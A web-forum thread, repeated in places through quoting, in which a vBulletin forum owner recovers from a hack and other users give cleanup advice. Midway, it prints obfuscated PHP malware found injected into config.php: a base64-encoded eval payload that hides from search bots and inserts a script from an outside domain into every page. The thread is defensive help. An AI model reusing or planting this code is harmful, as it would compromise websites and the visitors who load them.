I have been running this forum for about two years now and early this morning I was notified that I had a virus or that my forum was hacked. The website is floridaconcealedcarry.com/Forum/index.php.

I can't login to it and don't know where to start as far as correcting this. I was set to upgrade to the new 4.0 software in a few days and so this is devastating for me.

Thanks

I have been running this forum for about two years now and early this morning I was notified that I had a virus or that my forum was hacked. The website is *** removed life linkj ***

I can't login to it and don't know where to start as far as correcting this. I was set to upgrade to the new 4.0 software in a few days and so this is devastating for me.

Thanks

First off, I would advice anyone against clicking the link to the infected forum for security reasons.

That said, try to do a clean up of all your vb files by overwritting them with a fresh set from the vb package, your version. Then do another thorugh checkup of all your server space and database and if everything is ok upgrade to the latest version. Also change all the passwords for your admin, ftp, cp etc. And as last but not least, inform your host about this so they can check their logs and see how exactly they got in.

Can you ftp to your site? If so, replace all the files with totally default files and remove any non-vbulletin files.

Have you talked to your host? They may be able to help figure out how this happened.

Thanks for the advice. I will be doing these things now.

--------------- Added 1273245301 at 1273245301 ---------------

I have gone ahead and change my ftp password but I cannot access my CP or Admin. I will download the entire site from the server onto my computer in a secures sandbox. However, how can I save the user data from these files. My oldest backup is weeks old.

Thanks.

Thanks for the advice. I will be doing these things now.

--------------- Added 1273245301 at 1273245301 ---------------

I have gone ahead and change my ftp password but I cannot access my CP or Admin. I will download the entire site from the server onto my computer in a secures sandbox. However, how can I save the user data from these files. My oldest backup is weeks old.

Thanks.

That data is stored at the db and not in the php files. Try to clean them up as suggested above and see if it would help.

Thanks for all your help. The forum is now back up and running. I re-installed all the PHP files and that took care of the problem.

Thanks

Thanks for all your help. The forum is now back up and running. I re-installed all the PHP files and that took care of the problem.

Thanks

Glad to hear that. Did you also upgrade to the latest version? Also don''t forget to inform your host about it so they can investigate things on their end as well.

I was digging around in my config.php file while changing the db password and I found this code at the top of the file.

<?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZX QoJEdMT0JBTFNbJ21yX25vJ10pKXsgICAkR0xPQkFMU1snbXJf bm8nXT0xOyAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ21yb2JoJy kpeyAgICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ2dtbCcpKXsg ICAgIGZ1bmN0aW9uIGdtbCgpeyAgICAgIGlmICghc3RyaXN0ci gkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0sImdvb2dsZWJv dCIpJiYgKCFzdHJpc3RyKCRfU0VSVkVSWyJIVFRQX1VTRVJfQU dFTlQiXSwieWFob28iKSkpeyAgICAgICByZXR1cm4gYmFzZTY0 X2RlY29kZSgiUEhOamNtbHdkQ0J6Y21NOUltaDBkSEE2THk5cG JtUmxjMmxuYm5OMGRXUnBiMmx1Wm04dVkyOXRMMnh6TG5Cb2ND SStQQzl6WTNKcGNIUSsiKTsgICAgICB9ICAgICAgcmV0dXJuIC IiOyAgICAgfSAgICB9ICAgICAgICBpZighZnVuY3Rpb25fZXhp c3RzKCdnemRlY29kZScpKXsgICAgIGZ1bmN0aW9uIGd6ZGVjb2 RlKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMp eyAgICAgICRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2Mk FGNUQ9QG9yZChAc3Vic3RyKCRSNUE5Q0YxQjQ5NzUwMkFDQTIz QzhGNjExQTU2NDY4NEMsMywxKSk7ICAgICAgJFJCRTRDNEQwMz dFOTM5MjI2RjY1ODEyODg1QTUzREFEOT0xMDsgICAgICAkUkEz RDUyRTUyQTQ4OTM2Q0RFMEY1MzU2QkIwODY1MkYyPTA7ICAgIC AgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1 RCY0KXsgICAgICAgJFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QT REOTFFMjlFQj1AdW5wYWNrKCd2JyxzdWJzdHIoJFI1QTlDRjFC NDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QywxMCwyKSk7ICAgIC AgICRSNjNCRURFNkIxOTI2NkQ0RUZFQUQwN0E0RDkxRTI5RUI9 JFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQlsxXT sgICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUz REFEOSs9MiskUjYzQkVERTZCMTkyNjZENEVGRUFEMDdBNEQ5MU UyOUVCOyAgICAgIH0gICAgICBpZigkUjMwQjJBQjhEQzE0OTZE MDZCMjMwQTcxRDg5NjJBRjVEJjgpeyAgICAgICAkUkJFNEM0RD AzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5PUBzdHJwb3MoJFI1 QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QyxjaHIoMC ksJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSkr MTsgICAgICB9ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2Qj IzMEE3MUQ4OTYyQUY1RCYxNil7ICAgICAgICRSQkU0QzREMDM3 RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDk9QHN0cnBvcygkUjVBOU NGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLGNocigwKSwk UkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5KSsxOy AgICAgIH0gICAgICBpZigkUjMwQjJBQjhEQzE0OTZEMDZCMjMw QTcxRDg5NjJBRjVEJjIpeyAgICAgICAkUkJFNEM0RDAzN0U5Mz kyMjZGNjU4MTI4ODVBNTNEQUQ5Kz0yOyAgICAgIH0gICAgICAk UjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPUBnem luZmxhdGUoQHN1YnN0cigkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4 RjYxMUE1NjQ2ODRDLCRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMj g4NUE1M0RBRDkpKTsgICAgICBpZigkUjAzNEFFMkFCOTRGOTlD QzgxQjM4OUExODIyREEzMzUzPT09RkFMU0UpeyAgICAgICAkUj AzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPSRSNUE5 Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEM7ICAgICAgfS AgICAgIHJldHVybiAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUEx ODIyREEzMzUzOyAgICAgfSAgICB9ICAgIGZ1bmN0aW9uIG1yb2 JoKCRSRTgyRUU5QjEyMUY3MDk4OTVFRjU0RUJBN0ZBNkI3OEIp eyAgICAgSGVhZGVyKCdDb250ZW50LUVuY29kaW5nOiBub25lJy k7ICAgICAkUkExNzlBQkQzQTdCOUUyOEMzNjlGN0I1OUM1MUI4 MURFPWd6ZGVjb2RlKCRSRTgyRUU5QjEyMUY3MDk4OTVFRjU0RU JBN0ZBNkI3OEIpOyAgICAgICBpZihwcmVnX21hdGNoKCcvXDxc L2JvZHkvc2knLCRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5Qz UxQjgxREUpKXsgICAgICByZXR1cm4gcHJlZ19yZXBsYWNlKCcv KFw8XC9ib2R5W15cPl0qXD4pL3NpJyxnbWwoKS4iXG4iLickMS csJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERSk7 ICAgICB9ZWxzZXsgICAgICByZXR1cm4gJFJBMTc5QUJEM0E3Qj lFMjhDMzY5RjdCNTlDNTFCODFERS5nbWwoKTsgICAgIH0gICAg fSAgICBvYl9zdGFydCgnbXJv"));?>

Should this be there?

I was digging around in my config.php file while changing the db password and I found this code at the top of the file.



Should this be there?

No, that code should be deleted. If I were you I would also check thoroughly my server space for any thing out of ordinary. it would be best if you checked all the other .php non vb files that you might have. Like for ex from another script like wordpress, etc.

Will do. Thanks :up:

--------------- Added 1273286835 at 1273286835 ---------------

How many different places in the Vbulletin software do you have to update the db password when it's changed on the db server? I'm getting a db error after I updated the password on the db and the config.php file.

Changing in config.php is enough. But - did you reinstalled everything and I really mean everything ?
If the machine has been "hacked" once, how can you ensure nothing has been modified and that you can trust an installed "security tool" any longer ?

Do backups before of course :)

If there are modified files, like in your case the config.php, then the attacker most likely has not used vBulletin to enter your file system.

Most likely you are on a vulnerable server. Please contact your host and place a fresh copy of all files once your host has secured the server.

Hi to all
i have the same problem,
It all started on the first of May
i cleaned and restore everything to a month ego except the database
and attachments (mainly photos, no programs or any code )
the problem keeps coming buck every 4 - 5 days all .php files are modified
or some del, the first time it happened i also had the above code in all .php
files.
I contacted my host and they just keep giving me advice how to check and secure
my code (VB in my case) and they do nothing,
I also come to believe that the problem is host security problem,
Do you think that if i change host (since they do not seem to accept that it is a host security problem and investigate they are doing nothing to help just polite talk and advices )
will My problems be over??
Ps. I know nothing about programing and .PHP
Only how to upload and use VB (3 years experience)

Hi to all
i have the same problem,
It all started on the first of May
i cleaned and restore everything to a month ego except the database
and attachments (mainly photos, no programs or any code )
the problem keeps coming buck every 4 - 5 days all .php files are modified
or some del, the first time it happened i also had the above code in all .php
files.
I contacted my host and they just keep giving me advice how to check and secure
my code (VB in my case) and they do nothing,
I also come to believe that the problem is host security problem,
Do you think that if i change host (since they do not seem to accept that it is a host security problem and investigate they are doing nothing to help just polite talk and advices )
will My problems be over??
Ps. I know nothing about programing and .PHP
Only how to upload and use VB (3 years experience)

Well, in that case then you will be better off with another host who takes security more seriously.

Change all your passwords also. Hosting password, FTP password, Database password, and your Hosting company account login password.

Change all your passwords also. Hosting password, FTP password, Database password, and your Hosting company account login password.

already did that days ago
the problem keeps coming buck every 4-5 days as it was mansion it seems like the only solution is to change host

im curious, are you possibly using dreamhost or godaddy and use wordpress for your site
my friend has the same encrypted virus which keep popping up till i removed the code for him... but if its the mentioned host, u should move away

No i am not using wordpress
And yes my host is one of the above

The issue could've have begun if you installed some "nulled" scripts. Always a bad idea as the people who null them implant ways to get into your server within those scripts.

The issue could've have begun if you installed some "nulled" scripts. Always a bad idea as the people who null them implant ways to get into your server within those scripts.

in tthis case, i very much doubt it. since godaddy and dreamhost got their servers compromised and they admit it so millions of website got reported injected with that virus site

http://www.wpsecuritylock.com/ninoplas-base64-wordpress-hacked-on-godaddy-case-study/
even if u dont run wordpress that site got pretty got tip how to secure ur account with godaddy

--------------- Added 1274447260 at 1274447260 ---------------


and a goodperson posted a script to remove the infected code on all files
http://blog.sucuri.net/2010/05/simple-cleanup-solution-for-latest.html

Thank you all i did what you suggested it looks like my forum is clean 5 days now with no problem